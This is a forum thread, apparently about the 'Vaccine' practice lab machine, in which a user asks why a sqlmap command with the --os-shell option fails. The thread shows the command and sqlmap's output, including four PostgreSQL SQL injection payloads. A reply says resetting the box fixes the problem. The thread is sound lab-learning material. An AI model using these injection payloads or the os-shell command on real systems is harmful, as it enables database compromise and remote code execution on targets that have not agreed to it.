Vaccine (Starting point)

R4zzb3rry · May 14, 2020, 7:15pm

Hi,
I’m working on Vaccine and im stuck. When I get to the part where you enter

sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a’ --cookie=“PHPSESSID=73jv7pdmjsv7dsspoqtnlv66ls” --os-shell

Your supposed to get a shell but i don’t… I get this

[*] starting @ 15:13:48 /2020-05-14/

[15:13:48] [INFO] resuming back-end DBMS ‘postgresql’
[15:13:48] [INFO] testing connection to the target URL
got a 302 redirect to ‘http://10.10.10.46:80/index.php’. Do you want to follow? [Y/n] y
sqlmap resumed the following injection point(s) from stored session:

Parameter: search (GET)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=a’ AND (SELECT (CASE WHEN (9482=9482) THEN NULL ELSE CAST((CHR(79)||CHR(79)||CHR(121)||CHR(85)) AS NUMERIC) END)) IS NULL-- Whoq

Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=a' AND 8334=CAST((CHR(113)||CHR(112)||CHR(113)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (8334=8334) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(122)||CHR(120)||CHR(113)) AS NUMERIC)-- tHqK

Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=a';SELECT PG_SLEEP(5)--

Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=a' AND 1915=(SELECT 1915 FROM PG_SLEEP(5))-- MYpu

[15:13:51] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[15:13:51] [INFO] fingerprinting the back-end DBMS operating system
[15:13:52] [INFO] the back-end DBMS operating system is Linux
[15:13:52] [INFO] testing if current user is DBA
[15:13:53] [WARNING] the SQL query provided does not return any output
[15:13:53] [WARNING] running in a single-thread mode. Please consider usage of option ‘–threads’ for faster data retrieval
[15:13:53] [INFO] retrieved:
[15:13:53] [WARNING] unexpected HTTP code ‘302’ detected. Will use (extra) validation step in similar cases

[15:13:53] [WARNING] in case of continuous data retrieval problems you are advised to try a switch ‘–no-cast’ or switch ‘–hex’
[15:13:54] [INFO] detecting back-end DBMS version from its banner
[15:13:54] [INFO] resumed: ‘’
[15:13:54] [CRITICAL] unsupported feature on versions of PostgreSQL before 8.2

[*] ending @ 15:13:54 /2020-05-14/

Can anyone give me a nudge in the right direction??

Thanks!

dj1zz4 · July 8, 2020, 8:52am

same here. sqlmap succeeded the first times, but later while reproducing the steps for documentation I was unable to and got the same issues. When the box is reset and you’re using a clean session it will work again

Vaccine (Starting point)

[15:13:48] [INFO] resuming back-end DBMS ‘postgresql’ [15:13:48] [INFO] testing connection to the target URL got a 302 redirect to ‘http://10.10.10.46:80/index.php’. Do you want to follow? [Y/n] y sqlmap resumed the following injection point(s) from stored session:

[15:13:48] [INFO] resuming back-end DBMS ‘postgresql’
[15:13:48] [INFO] testing connection to the target URL
got a 302 redirect to ‘http://10.10.10.46:80/index.php’. Do you want to follow? [Y/n] y
sqlmap resumed the following injection point(s) from stored session: